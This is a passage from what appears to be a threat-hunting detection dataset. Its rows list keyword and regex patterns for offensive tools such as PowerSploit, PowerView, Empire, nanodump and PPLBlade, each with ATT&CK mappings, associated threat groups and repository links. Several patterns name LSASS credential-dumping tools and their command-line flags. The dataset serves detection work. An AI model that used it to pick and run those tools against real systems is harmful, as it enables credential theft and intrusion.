penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - Turla","Framework","https://github.com/PowerShellMafia/PowerSploit","1","1","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","55299" "*PowerSploit.*",".{0,1000}PowerSploit\..{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - Turla","Framework","https://github.com/PowerShellMafia/PowerSploit","1","1","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","55300" "*PowerSploit/releases*",".{0,1000}PowerSploit\/releases.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - Turla","Framework","https://github.com/PowerShellMafia/PowerSploit","1","1","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","55301" "*powerstager*",".{0,1000}powerstager.{0,1000}","offensive_tool_keyword","PowerStager","PowerStager: This script creates an executable stager that downloads a selected powershell payload.","T1105 - T1059.001 - T1204","TA0002 - TA0003 - TA0004","N/A","N/A","Resource Development","https://github.com/z0noxz/powerstager","1","1","N/A","N/A","N/A","2","184","48","2019-12-15T09:30:05Z","2017-04-17T12:13:31Z","55302" "*PowerUp.ps1*",".{0,1000}PowerUp\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","PowerUp.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","55303" "*PowerUp.ps1*",".{0,1000}PowerUp\.ps1.{0,1000}","offensive_tool_keyword","FruityC2","FruityC2 is a post-exploitation framework based on the deployment of agents on compromised machines","T1090 - T1572 - T1071.001","TA0010 - TA0011 - TA0008 - TA0005","N/A","MuddyWater","C2","https://github.com/xtr4nge/FruityC2","1","1","N/A","https://documents.trendmicro.com/assets/white_papers/wp_new_muddywater_findings_uncovered.pdf","10","10","208","67","2017-12-04T17:05:23Z","2017-01-11T17:27:45Z","55304"
"*PowerUpSQL*",".{0,1000}PowerUpSQL.{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1078.002 - T1547.001 - T1059.001 - T1106 - T1550.002 - T1087 - T1003 - T1053 - T1047","TA0003 - TA0002 - TA0008 - TA0011 - TA0006","N/A","Black Basta","C2","https://github.com/NetSPI/PowerUpSQL","1","1","N/A","N/A","10","10","2564","472","2024-12-12T18:09:39Z","2016-06-22T01:22:39Z","55305" "*PowerUpSQL.ps1*",".{0,1000}PowerUpSQL\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - 
CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","55306" "*PowerView.ps1*",".{0,1000}PowerView\.ps1.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","1","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","55307" "*PowerView.ps1*",".{0,1000}PowerView\.ps1.{0,1000}","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controller running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","BlackCat - Scattered Spider*","C2","https://github.com/Arno0x/DBC2","1","1","N/A","N/A","10","10","295","86","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z","55308" "*PowerView.ps1*",".{0,1000}PowerView\.ps1.{0,1000}","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 -
T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca - Black Basta","Exploitation tool","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","55309" "*powerview.ps1*",".{0,1000}powerview\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1078","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - 
Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","55310" "*PowerView.ps1*",".{0,1000}PowerView\.ps1.{0,1000}","offensive_tool_keyword","FruityC2","FruityC2 is a post-exploitation framework based on the deployment of agents on compromised machines","T1090 - T1572 - T1071.001","TA0010 - TA0011 - TA0008 - TA0005","N/A","MuddyWater","C2","https://github.com/xtr4nge/FruityC2","1","1","N/A","https://documents.trendmicro.com/assets/white_papers/wp_new_muddywater_findings_uncovered.pdf","10","10","208","67","2017-12-04T17:05:23Z","2017-01-11T17:27:45Z","55311" "*PowerView.ps1*",".{0,1000}PowerView\.ps1.{0,1000}","offensive_tool_keyword","powerview","PowerView is a PowerShell tool to gain network situational awareness on Windows domains. It contains a set of pure-PowerShell replacements for various windows net commands. which utilize PowerShell AD hooks and underlying Win32 API functions to perform useful Windows domain functionality. It also implements various useful metafunctions. including some custom-written user-hunting functions which will identify where on the network specific users are logged into. It can also check which machines on the domain the current user has local administrator access on.
Several functions for the enumeration and abuse of domain trusts also exist","T1087 - T1069 - T1064 - T1002 - T1552","TA0002 - TA0003 - TA0008","N/A","Dispossessor - MAZE - Conti - XingLocker - Rhysida - BlackByte - Black Basta - MUSTANG PANDA","Discovery","https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","55312" "*PowerView.ps1*",".{0,1000}PowerView\.ps1.{0,1000}","offensive_tool_keyword","PSAttack","PSAttack contains over 100 commands for Privilege Escalation - Recon and Data Exfiltration","T1059 - T1212 - T1012 - T1087 - T1005 - T1041 - T1020","TA0002 - TA0004 - TA0005 - TA0007 - TA0010 - TA0008","N/A","N/A","Exploitation tool","https://github.com/GDSSecurity/PSAttack","1","1","N/A","N/A","10","1","45","15","2017-04-04T20:37:33Z","2016-02-22T23:45:22Z","55313" "*PowerView.ShareInfo*",".{0,1000}PowerView\.ShareInfo.{0,1000}","offensive_tool_keyword","powerview","PowerView is a PowerShell tool to gain network situational awareness on Windows domains","T1046 - T1087.001 - T1016","TA0007 - TA0008 - TA0009","N/A","Dispossessor - MAZE - Conti - XingLocker - Rhysida - BlackByte - Black Basta - MUSTANG PANDA","Discovery","https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1","1","0","#content","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","55314" "*PowerView.SPNTicket*",".{0,1000}PowerView\.SPNTicket.{0,1000}","offensive_tool_keyword","powerview","PowerView is a PowerShell tool to gain network situational awareness on Windows domains","T1046 - T1087.001 - T1016","TA0007 - TA0008 - TA0009","N/A","Dispossessor - MAZE - Conti - XingLocker - Rhysida - BlackByte - Black Basta - MUSTANG PANDA","Discovery","https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1","1","0","#content","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","55315"
"*PowerView_dev.ps1*",".{0,1000}PowerView_dev\.ps1.{0,1000}","offensive_tool_keyword","viperc2","vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","Black Basta","Framework","https://github.com/FunnyWolf/vipermsf","1","1","N/A","N/A","N/A","","N/A","","","","55316" "*PowerView-2.0-tricks.ps1*",".{0,1000}PowerView\-2\.0\-tricks\.ps1.{0,1000}","offensive_tool_keyword","powerview","PowerView is a PowerShell tool to gain network situational awareness on Windows domains","T1046 - T1087.001 - T1016","TA0007 - TA0008 - TA0009","N/A","Dispossessor - MAZE - Conti - XingLocker - Rhysida - BlackByte - Black Basta - MUSTANG PANDA","Discovery","https://github.com/anthonysecurity/redteam_toolkit/blob/master/References/PowerView-2.0-tricks.ps1","1","0","#content","https://vx-underground.org/Archive/Dispossessor%20Leaks","10","1","24","19","2018-08-23T11:18:21Z","2018-02-07T16:29:53Z","55317" "*PowerView3-Aggressor*",".{0,1000}PowerView3\-Aggressor.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script menu for Powerview/SharpView","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - 
T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/tevora-threat/PowerView3-Aggressor","1","1","N/A","N/A","10","10","130","40","2018-07-24T21:52:03Z","2018-07-24T21:16:10Z","55318" "*ppenum.c*",".{0,1000}ppenum\.c.{0,1000}","offensive_tool_keyword","cobaltstrike","Simple BOF to read the protection level of a process","T1012","TA0007","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","Reconnaissance","https://github.com/rasta-mouse/PPEnum","1","1","N/A","N/A","N/A","2","115","9","2023-05-10T16:41:09Z","2023-05-10T16:38:36Z","55320" 
"*ppenum.exe*",".{0,1000}ppenum\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Simple BOF to read the protection level of a process","T1012","TA0007","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","Reconnaissance","https://github.com/rasta-mouse/PPEnum","1","1","N/A","N/A","N/A","2","115","9","2023-05-10T16:41:09Z","2023-05-10T16:38:36Z","55321" "*ppenum.x64.*",".{0,1000}ppenum\.x64\..{0,1000}","offensive_tool_keyword","cobaltstrike","Simple BOF to read the protection level of a process","T1012","TA0007","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","Reconnaissance","https://github.com/rasta-mouse/PPEnum","1","1","N/A","N/A","N/A","2","115","9","2023-05-10T16:41:09Z","2023-05-10T16:38:36Z","55322" 
"*ppenum.x86.*",".{0,1000}ppenum\.x86\..{0,1000}","offensive_tool_keyword","cobaltstrike","Simple BOF to read the protection level of a process","T1012","TA0007","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","Reconnaissance","https://github.com/rasta-mouse/PPEnum","1","1","N/A","N/A","N/A","2","115","9","2023-05-10T16:41:09Z","2023-05-10T16:38:36Z","55323" "*ppid_shellcode_spawn.bin*",".{0,1000}ppid_shellcode_spawn\.bin.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","1","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","55324" "*ppidShellcodeSpawn4-cleaned.bin*",".{0,1000}ppidShellcodeSpawn4\-cleaned\.bin.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","1","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","55325" "*ppidShellcodeSpawn-cleaned.bin*",".{0,1000}ppidShellcodeSpawn\-cleaned\.bin.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense 
Evasion","https://github.com/trustedsec/The_Shelf","1","1","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","55326" "*PPIDSpoof.ps1*",".{0,1000}PPIDSpoof\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","1","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","55327" "*ppl* --elevate-handle *.dmp*",".{0,1000}ppl.{0,1000}\s\-\-elevate\-handle\s.{0,1000}\.dmp.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. 
A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","0","N/A","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","55328" "*ppl_dump.x64*",".{0,1000}ppl_dump\.x64.{0,1000}","offensive_tool_keyword","cobaltstrike","A faithful transposition of the key features/functionality of @itm4n's PPLDump project as a BOF.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
Sandworm","C2","https://github.com/EspressoCake/PPLDump_BOF","1","1","N/A","N/A","10","10","140","25","2021-09-24T07:10:04Z","2021-09-24T07:05:59Z","55329" "*ppl_medic_dll.*",".{0,1000}ppl_medic_dll\..{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","55330" "*PPLBlade.dmp*",".{0,1000}PPLBlade\.dmp.{0,1000}","offensive_tool_keyword","PPLBlade","Protected Process Dumper Tool that support obfuscating memory dump and transferring it on remote workstations without dropping it onto the disk.","T1003.001 - T1027.004 - T1560.001 - T1039 - T1570","TA0006 - TA0005 - TA0010 - TA0003","N/A","N/A","Credential Access","https://github.com/tastypepperoni/PPLBlade","1","1","N/A","N/A","10","6","545","59","2023-08-30T07:59:51Z","2023-08-29T19:36:04Z","55331" "*PPLBlade.exe*",".{0,1000}PPLBlade\.exe.{0,1000}","offensive_tool_keyword","PPLBlade","Protected Process Dumper Tool that support obfuscating memory dump and transferring it on remote workstations without dropping it onto the disk.","T1003.001 - T1027.004 - T1560.001 - T1039 - T1570","TA0006 - TA0005 - TA0010 - TA0003","N/A","N/A","Credential Access","https://github.com/tastypepperoni/PPLBlade","1","1","N/A","N/A","10","6","545","59","2023-08-30T07:59:51Z","2023-08-29T19:36:04Z","55332" "*PPLBlade-main.*",".{0,1000}PPLBlade\-main\..{0,1000}","offensive_tool_keyword","PPLBlade","Protected Process Dumper Tool that support obfuscating memory dump and transferring it on remote workstations without dropping it onto the disk.","T1003.001 - T1027.004 - T1560.001 - T1039 - T1570","TA0006 - TA0005 - TA0010 - TA0003","N/A","N/A","Credential 
